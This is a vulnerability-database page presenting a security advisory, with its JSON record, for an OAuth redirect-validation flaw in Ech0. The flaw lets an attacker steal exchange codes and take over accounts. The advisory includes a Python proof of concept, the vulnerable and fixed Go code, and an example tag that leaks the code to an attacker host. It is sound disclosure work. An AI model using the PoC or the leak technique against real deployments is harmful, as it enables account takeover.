GHSA-P64J-F4X9-WQ66

Vulnerability from github – Published: 2026-05-07 21:30 – Updated: 2026-05-07 21:30
VLAI?
Summary
Ech0's OAuth redirect URI validation ignores path component, enables exchange-code theft
Details

Summary

parseAndValidateClientRedirect at internal/service/auth/auth.go:448 validates OAuth client-redirect URIs by comparing only scheme and host against the admin-configured allowlist. Path, query, and fragment are ignored. The initiator at /oauth/:provider/login embeds the caller-supplied redirect_uri verbatim into the signed state JWT without any validation at login time. Alice submits a crafted redirect_uri whose host matches an allowed origin but whose path points to any page on that host. After the provider exchange, Ech0 redirects the victim to the attacker-chosen path with the one-time exchange code in the query string. If the chosen path leaks the URL via Referer, analytics, or an open redirect, the attacker trades the code at POST /api/auth/exchange for the victim's access and refresh tokens. RFC 6749 §3.1.2 requires exact redirect URI matching.

Details

Validation at internal/service/auth/auth.go:448:

matched := false
for _, item := range allowed {
    allowURL, parseErr := url.Parse(strings.TrimSpace(item))
    if parseErr != nil || allowURL == nil || allowURL.Host == "" {
        continue
    }
    if strings.EqualFold(redirectURL.Scheme, allowURL.Scheme) &&
       strings.EqualFold(redirectURL.Host, allowURL.Host) {
        matched = true
        break
    }
}

Scheme and host compared via EqualFold. Path, query, fragment all ignored. An allowlist entry of https://myecho.example.com/dashboard matches every https://myecho.example.com/<anything> the attacker sends.

Login flow at internal/service/auth/auth.go:141 (GetOAuthLoginURL) and the handler at internal/handler/auth/oauth.go:43:

redirectURI := ctx.Query("redirect_uri")
redirectURL, err := h.authService.GetOAuthLoginURL(provider, redirectURI)
// ...
ctx.Redirect(302, redirectURL)

No validation at login. The raw redirect_uri query parameter is passed to GetOAuthLoginURL, which encodes it into the signed state JWT alongside the provider name and nonce. The state JWT travels through the OAuth provider and returns on the callback.

At callback time, parseAndValidateClientRedirect(oauthState.Redirect) fires at internal/service/auth/auth.go:372 and :427 inside the callback handler chain. Scheme and host are the only gates on the attacker-chosen URI.

After validation, the server generates a one-time exchange code and redirects the browser to the attacker-chosen path:

302 Location: https://myecho.example.com/<attacker-path>?code=<one-time-exchange-code>

The code is valid at the public endpoint POST /api/auth/exchange for up to 60 seconds (single-use). An attacker who reads the code from the URL trades it for the victim's access token and refresh token.

Proof of Concept

Default install with OAuth2 configured. Admin allows https://myecho.example.com/dashboard as the return URL; Alice sends a crafted login link whose redirect points elsewhere on the same host:

import requests, urllib.parse, base64, json
TARGET = "http://localhost:8300"

# Admin setup: enable OAuth with one allowed return URL (dashboard).
owner = requests.post(f"{TARGET}/api/login",
                      json={"username": "owner", "password": "owner-pw"}
                     ).json()["data"]["access_token"]
requests.put(f"{TARGET}/api/oauth2/settings",
             headers={"Authorization": f"Bearer {owner}",
                      "content-type": "application/json"},
             json={"enable": True, "provider": "github",
                   "client_id": "poc-client-id", "client_secret": "poc-client-secret",
                   "redirect_uri": f"{TARGET}/oauth/github/callback",
                   "scopes": ["read:user"],
                   "auth_url": "https://github.com/login/oauth/authorize",
                   "token_url": "https://github.com/login/oauth/access_token",
                   "user_info_url": "https://api.github.com/user",
                   "auth_redirect_allowed_return_urls": ["https://myecho.example.com/dashboard"]})

# Alice's link to the victim. Same host, different path.
for attacker_uri in [
    "https://myecho.example.com/dashboard",            # control, allowed
    "https://myecho.example.com/attacker-chosen-path", # path bypass
    "https://attacker.example/foo",                    # different host, should also fail
]:
    url = f"{TARGET}/oauth/github/login?redirect_uri=" + urllib.parse.quote(attacker_uri)
    r = requests.get(url, allow_redirects=False)
    loc = r.headers.get("Location", "")
    state_jwt = urllib.parse.parse_qs(urllib.parse.urlparse(loc).query).get("state", [""])[0]
    pad = lambda s: s + "=" * (-len(s) % 4)
    payload = json.loads(base64.urlsafe_b64decode(pad(state_jwt.split(".")[1])))
    print(f"  redirect_uri={attacker_uri!r}")
    print(f"    login HTTP: {r.status_code}")
    print(f"    state JWT redirect: {payload.get('redirect')!r}")

Observed on v4.5.6:

redirect_uri='https://myecho.example.com/dashboard'
  login HTTP: 302
  state JWT redirect: 'https://myecho.example.com/dashboard'
redirect_uri='https://myecho.example.com/attacker-chosen-path'
  login HTTP: 302
  state JWT redirect: 'https://myecho.example.com/attacker-chosen-path'
redirect_uri='https://attacker.example/foo'
  login HTTP: 302
  state JWT redirect: 'https://attacker.example/foo'

All three redirect_uri values sail through login with no validation; the state JWT carries the attacker-chosen URL verbatim. The first two pass the callback's scheme+host check against the dashboard allowlist entry and the server redirects to the attacker-chosen path with the exchange code appended. The third (different host) fails the callback's allowlist check, so it does not land; the point is that no validation occurs at login time, only at callback, and the callback check ignores path entirely.

Impact

Alice delivers a single link to Bob (phishing email, social-engineering message, embedded redirect in a compromised site). Bob clicks, completes OAuth as himself, and lands on the attacker-chosen path on the legitimate Ech0 host with ?code=<one-time> in the URL. Three paths to full account takeover follow:

  • Referer leakage. A single <img src="https://attacker.site/log"> or <script src> on the attacker-chosen path sends the victim's full URL (including the code) to the attacker in the Referer header.
  • Analytics and third-party scripts. Any page on the allowlisted host that loads Google Analytics, Sentry, or Segment reports the URL (including the code) to those services. Any attacker with access to those accounts reads the code.
  • Open-redirect chains. If any path on the allowlisted host has an open-redirect bug, the attacker targets it and bounces the URL (with the code) to their server.

The code is trade-in-able at POST /api/auth/exchange, which is public. The exchange returns the victim's access_token and refresh_token. Full account takeover follows.

Preconditions: Ech0's OAuth is configured (opt-in), one allowlisted host has any path that leaks URLs, and the attacker reaches the victim with a crafted link. RFC 6749 §3.1.2 exists precisely to prevent this chain.

Recommended Fix

Require exact redirect URI matching per the spec. Compare scheme, host, and path together:

redirectNorm := strings.ToLower(redirectURL.Scheme) + "://" +
                strings.ToLower(redirectURL.Host) +
                redirectURL.Path
for _, item := range allowed {
    allowURL, parseErr := url.Parse(strings.TrimSpace(item))
    if parseErr != nil || allowURL == nil || allowURL.Host == "" {
        continue
    }
    allowNorm := strings.ToLower(allowURL.Scheme) + "://" +
                 strings.ToLower(allowURL.Host) +
                 allowURL.Path
    if redirectNorm == allowNorm {
        matched = true
        break
    }
}

Validate the redirect_uri at login time too, so a malformed value never enters the state JWT:

func (s *AuthService) GetOAuthLoginURL(provider, redirectURI string) (string, error) {
    if redirectURI != "" {
        if _, err := s.parseAndValidateClientRedirect(redirectURI); err != nil {
            return "", err
        }
    }
    // ... rest unchanged
}

Document the exact-match semantics in the admin panel. Every allowlisted return URL needs the full path the front-end lands on.

Found by aisafe.io

Severity ?
8.0 (High)
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lin-snow/Ech0"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.8-0.20260503040728-a7e8b8e84bd1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1173",
      "CWE-601"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T21:30:45Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`parseAndValidateClientRedirect` at `internal/service/auth/auth.go:448` validates OAuth client-redirect URIs by comparing only scheme and host against the admin-configured allowlist. Path, query, and fragment are ignored. The initiator at `/oauth/:provider/login` embeds the caller-supplied `redirect_uri` verbatim into the signed state JWT without any validation at login time. Alice submits a crafted `redirect_uri` whose host matches an allowed origin but whose path points to any page on that host. After the provider exchange, Ech0 redirects the victim to the attacker-chosen path with the one-time exchange code in the query string. If the chosen path leaks the URL via Referer, analytics, or an open redirect, the attacker trades the code at `POST /api/auth/exchange` for the victim\u0027s access and refresh tokens. RFC 6749 \u00a73.1.2 requires exact redirect URI matching.\n\n## Details\n\nValidation at `internal/service/auth/auth.go:448`:\n\n```go\nmatched := false\nfor _, item := range allowed {\n    allowURL, parseErr := url.Parse(strings.TrimSpace(item))\n    if parseErr != nil || allowURL == nil || allowURL.Host == \"\" {\n        continue\n    }\n    if strings.EqualFold(redirectURL.Scheme, allowURL.Scheme) \u0026\u0026\n       strings.EqualFold(redirectURL.Host, allowURL.Host) {\n        matched = true\n        break\n    }\n}\n```\n\nScheme and host compared via `EqualFold`. Path, query, fragment all ignored. An allowlist entry of `https://myecho.example.com/dashboard` matches every `https://myecho.example.com/\u003canything\u003e` the attacker sends.\n\nLogin flow at `internal/service/auth/auth.go:141` (`GetOAuthLoginURL`) and the handler at `internal/handler/auth/oauth.go:43`:\n\n```go\nredirectURI := ctx.Query(\"redirect_uri\")\nredirectURL, err := h.authService.GetOAuthLoginURL(provider, redirectURI)\n// ...\nctx.Redirect(302, redirectURL)\n```\n\nNo validation at login. The raw `redirect_uri` query parameter is passed to `GetOAuthLoginURL`, which encodes it into the signed state JWT alongside the provider name and nonce. The state JWT travels through the OAuth provider and returns on the callback.\n\nAt callback time, `parseAndValidateClientRedirect(oauthState.Redirect)` fires at `internal/service/auth/auth.go:372` and `:427` inside the callback handler chain. Scheme and host are the only gates on the attacker-chosen URI.\n\nAfter validation, the server generates a one-time exchange code and redirects the browser to the attacker-chosen path:\n\n```\n302 Location: https://myecho.example.com/\u003cattacker-path\u003e?code=\u003cone-time-exchange-code\u003e\n```\n\nThe code is valid at the public endpoint `POST /api/auth/exchange` for up to 60 seconds (single-use). An attacker who reads the code from the URL trades it for the victim\u0027s access token and refresh token.\n\n## Proof of Concept\n\nDefault install with OAuth2 configured. Admin allows `https://myecho.example.com/dashboard` as the return URL; Alice sends a crafted login link whose redirect points elsewhere on the same host:\n\n```python\nimport requests, urllib.parse, base64, json\nTARGET = \"http://localhost:8300\"\n\n# Admin setup: enable OAuth with one allowed return URL (dashboard).\nowner = requests.post(f\"{TARGET}/api/login\",\n                      json={\"username\": \"owner\", \"password\": \"owner-pw\"}\n                     ).json()[\"data\"][\"access_token\"]\nrequests.put(f\"{TARGET}/api/oauth2/settings\",\n             headers={\"Authorization\": f\"Bearer {owner}\",\n                      \"content-type\": \"application/json\"},\n             json={\"enable\": True, \"provider\": \"github\",\n                   \"client_id\": \"poc-client-id\", \"client_secret\": \"poc-client-secret\",\n                   \"redirect_uri\": f\"{TARGET}/oauth/github/callback\",\n                   \"scopes\": [\"read:user\"],\n                   \"auth_url\": \"https://github.com/login/oauth/authorize\",\n                   \"token_url\": \"https://github.com/login/oauth/access_token\",\n                   \"user_info_url\": \"https://api.github.com/user\",\n                   \"auth_redirect_allowed_return_urls\": [\"https://myecho.example.com/dashboard\"]})\n\n# Alice\u0027s link to the victim. Same host, different path.\nfor attacker_uri in [\n    \"https://myecho.example.com/dashboard\",            # control, allowed\n    \"https://myecho.example.com/attacker-chosen-path\", # path bypass\n    \"https://attacker.example/foo\",                    # different host, should also fail\n]:\n    url = f\"{TARGET}/oauth/github/login?redirect_uri=\" + urllib.parse.quote(attacker_uri)\n    r = requests.get(url, allow_redirects=False)\n    loc = r.headers.get(\"Location\", \"\")\n    state_jwt = urllib.parse.parse_qs(urllib.parse.urlparse(loc).query).get(\"state\", [\"\"])[0]\n    pad = lambda s: s + \"=\" * (-len(s) % 4)\n    payload = json.loads(base64.urlsafe_b64decode(pad(state_jwt.split(\".\")[1])))\n    print(f\"  redirect_uri={attacker_uri!r}\")\n    print(f\"    login HTTP: {r.status_code}\")\n    print(f\"    state JWT redirect: {payload.get(\u0027redirect\u0027)!r}\")\n```\n\nObserved on v4.5.6:\n\n```\nredirect_uri=\u0027https://myecho.example.com/dashboard\u0027\n  login HTTP: 302\n  state JWT redirect: \u0027https://myecho.example.com/dashboard\u0027\nredirect_uri=\u0027https://myecho.example.com/attacker-chosen-path\u0027\n  login HTTP: 302\n  state JWT redirect: \u0027https://myecho.example.com/attacker-chosen-path\u0027\nredirect_uri=\u0027https://attacker.example/foo\u0027\n  login HTTP: 302\n  state JWT redirect: \u0027https://attacker.example/foo\u0027\n```\n\nAll three `redirect_uri` values sail through login with no validation; the state JWT carries the attacker-chosen URL verbatim. The first two pass the callback\u0027s scheme+host check against the `dashboard` allowlist entry and the server redirects to the attacker-chosen path with the exchange code appended. The third (different host) fails the callback\u0027s allowlist check, so it does not land; the point is that no validation occurs at login time, only at callback, and the callback check ignores path entirely.\n\n## Impact\n\nAlice delivers a single link to Bob (phishing email, social-engineering message, embedded redirect in a compromised site). Bob clicks, completes OAuth as himself, and lands on the attacker-chosen path on the legitimate Ech0 host with `?code=\u003cone-time\u003e` in the URL. Three paths to full account takeover follow:\n\n- **Referer leakage.** A single `\u003cimg src=\"https://attacker.site/log\"\u003e` or `\u003cscript src\u003e` on the attacker-chosen path sends the victim\u0027s full URL (including the code) to the attacker in the Referer header.\n- **Analytics and third-party scripts.** Any page on the allowlisted host that loads Google Analytics, Sentry, or Segment reports the URL (including the code) to those services. Any attacker with access to those accounts reads the code.\n- **Open-redirect chains.** If any path on the allowlisted host has an open-redirect bug, the attacker targets it and bounces the URL (with the code) to their server.\n\nThe code is trade-in-able at `POST /api/auth/exchange`, which is public. The exchange returns the victim\u0027s access_token and refresh_token. Full account takeover follows.\n\nPreconditions: Ech0\u0027s OAuth is configured (opt-in), one allowlisted host has any path that leaks URLs, and the attacker reaches the victim with a crafted link. RFC 6749 \u00a73.1.2 exists precisely to prevent this chain.\n\n## Recommended Fix\n\nRequire exact redirect URI matching per the spec. Compare scheme, host, and path together:\n\n```go\nredirectNorm := strings.ToLower(redirectURL.Scheme) + \"://\" +\n                strings.ToLower(redirectURL.Host) +\n                redirectURL.Path\nfor _, item := range allowed {\n    allowURL, parseErr := url.Parse(strings.TrimSpace(item))\n    if parseErr != nil || allowURL == nil || allowURL.Host == \"\" {\n        continue\n    }\n    allowNorm := strings.ToLower(allowURL.Scheme) + \"://\" +\n                 strings.ToLower(allowURL.Host) +\n                 allowURL.Path\n    if redirectNorm == allowNorm {\n        matched = true\n        break\n    }\n}\n```\n\nValidate the `redirect_uri` at login time too, so a malformed value never enters the state JWT:\n\n```go\nfunc (s *AuthService) GetOAuthLoginURL(provider, redirectURI string) (string, error) {\n    if redirectURI != \"\" {\n        if _, err := s.parseAndValidateClientRedirect(redirectURI); err != nil {\n            return \"\", err\n        }\n    }\n    // ... rest unchanged\n}\n```\n\nDocument the exact-match semantics in the admin panel. Every allowlisted return URL needs the full path the front-end lands on.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-p64j-f4x9-wq66",
  "modified": "2026-05-07T21:30:45Z",
  "published": "2026-05-07T21:30:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-p64j-f4x9-wq66"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lin-snow/Ech0/commit/a7e8b8e84bd1e3db090dfb720f2c6c433356b442"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lin-snow/Ech0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ech0\u0027s OAuth redirect URI validation ignores path component, enables exchange-code theft"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.